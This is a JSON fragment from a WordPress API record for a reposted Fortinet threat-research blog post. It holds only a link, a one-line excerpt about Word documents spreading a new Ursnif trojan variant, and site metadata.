aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qxx1b0gslklfu2kjckea-holder\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/gB4h2sgbiiQ\/ursnif-variant-spreading-word-document.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/content\/fortinet-blog\/us\/en\/threat-research\/ursnif-variant-spreading-word-document\/_jcr_content\/root\/responsivegrid\/image.img.png\"\/><br \/>FortiGuard Labs recently captured a number of Word documents that were spreading a new variant of the Ursnif trojan. Learn more about how it operates and the techniques it uses.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/gB4h2sgbiiQ&#8221; height=&#8221;1&#8243; width=&#8221;1&#8243; alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16011","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16011"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16011\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16011"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}